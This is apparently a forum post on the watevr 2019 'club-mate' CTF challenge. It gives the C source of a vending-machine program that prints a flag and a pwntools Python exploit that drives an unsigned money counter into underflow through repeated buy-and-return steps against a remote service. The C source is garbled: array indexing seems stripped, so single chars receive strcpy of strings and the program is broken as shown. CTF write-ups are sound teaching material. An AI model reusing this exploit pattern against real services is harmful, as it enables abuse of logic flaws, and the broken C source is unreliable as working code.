watevr_2019_pwn_club-mate
源码:#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#include <signal.h>
struct club_mate {
char a1;
char a2;
char a3;
bool isInMachine;
};
void printFlag(){
printf("%s", "watevr{P4nTa_M33333333Ra_youtube.com/watch?v=QGoEYcRmzq0}\n");
printf("%s", "Good Job saving saving the planet and staying rich at the same time!\n");
exit(0);
}
bool hazCanInMachine(struct club_mate bottles){
int index;
for(index = 0; index < 15; index++) {
if(bottles.isInMachine) {
return true;
}
}
return false;
}
void sig(int sign){
exit(0);
}
int main()
{
signal(SIGALRM, sig);
alarm(40);
unsigned char money = 255; //mcDonald's hired you as their *national* security expert and now you are the richest mcDonald's employee!
struct club_mate bottles;
char can;
int i = 0;
int tmpVar = 18;
while(true) {
if(250 + tmpVar < money) {
printFlag();
}
while(i < 15) {
strcpy(bottles.a1, "\033[0;33m /\\\033[0m");
strcpy(bottles.a2, "\033[0;33m ||\033[0m");
strcpy(bottles.a3, "\033[0;33m ¯¯\033[0m");
bottles.isInMachine = true;
tmpVar--;
i += 1;
}
while(hazCanInMachine(bottles)) {
char can;
strcpy(can, "");
char payment;
strcpy(payment, "");
printf("%s", "You have been pwning all day and it has made you really thirsty!\nLucky for you i just finished building a club-mate vending machine!\n");
printf("balance: %i\n", money);
printf("%s", ".---------------.\n");
printf("%s","|");
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s","|\n");
printf("%s","| |\n");
printf("%s","|");
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s","|\n");
printf("%s","| |\n");
printf("%s","|");
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s",bottles.a1);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s",bottles.a2);
printf("%s","|\n");
printf("%s","|");
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s",bottles.a3);
printf("%s", "|\n");
printf("%s", "| |\n");
printf("%s", "¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\n");
printf("%s", "Enter which club-mate you want to buy/return: "); //0-14
fflush(stdout);
scanf("%2s", can);
int bottle = atoi(can);
int securityCheck = money;
if(bottles.isInMachine)
{
printf("%s", "the ");
printf("%s", can);
printf("%s\n", " it is!");
printf("%s\n", "That will be $4");
//this time you actually have money with you!
fflush(stdout);
scanf("%2s", payment);
if(!strcmp("$4", payment))
{
printf("%s\n", "Thanks, here is your club-mate!");
strcpy(bottles.a1, " ");
strcpy(bottles.a2, " ");
strcpy(bottles.a3, " ");
bottles.isInMachine = false;
money -= 4;
}
}
else if(bottles.isInMachine)
{
printf("%s", "I asked for $4 not ");
printf("%s", payment);
printf("\n");
}
else
{
char returnCan;
printf("Would you like to return can number ");
printf("%s", can);
printf("%s", "?\n");
fflush(stdout);
scanf("%16s", returnCan);
if(!strcmp(returnCan, "yes") || !strcmp(returnCan, "Yes"))
{
bottles.isInMachine = true;
strcpy(bottles.a1, "\033[0;33m /\\\033[0m");
strcpy(bottles.a2, "\033[0;33m ||\033[0m");
strcpy(bottles.a3, "\033[0;33m ¯¯\033[0m");
while(tmpVar != 0) {
int calc = ~(~money | ~tmpVar);
money = money ^ tmpVar;
tmpVar = calc << 1;
}
tmpVar = abs(securityCheck-money);
}
}
}
}
return 0;
}
exp:
#the goal is to get back to 255 and taking all the club mates aswell, the money is short unsigned integer and will underflow to 255 when going negative.
#thus the goal is to reach -1 dollars while and at the same time grabbing the last bottleself.
#this means you need to have exactly $59 and all bottles in the returned to the machine before grabbing them all (since 4*15 = 60 and we want to end at -1)
import subprocess, time
from pwn import *
money = 255
bottles = 15
exploit = ""
def buy(bottle):
payload = []
payload.append(str(bottle))
payload.append("\n$4\n")
return "".join(payload)
def returnB(bottle):
payload = []
payload.append(str(bottle))
payload.append("\nyes\n")
return "".join(payload)
def validate(ip, port, exploit):
#pipe payload to server
r = remote(ip, port)
message = ""
for line in exploit.split("\n"):
r.sendline(line)
message += str(r.recvline())
message += str(r.recvuntil("Good"))
return message
try:
while money != 59:
exploit += buy(0)
exploit += returnB(0)
money -= 1
while bottles != -1:
exploit += buy(bottles)
bottles -= 1
flag = input("flag: ").replace("\n", "")
ip, port = input("service: ").split(":")
res = validate(str(ip), int(port), exploit)
if flag in res:
print("success")
exit(0)
else:
print("fail")
exit(1)
except Exception as e:
print("fail due to ")
print(e)
exit(1)
页:
[1]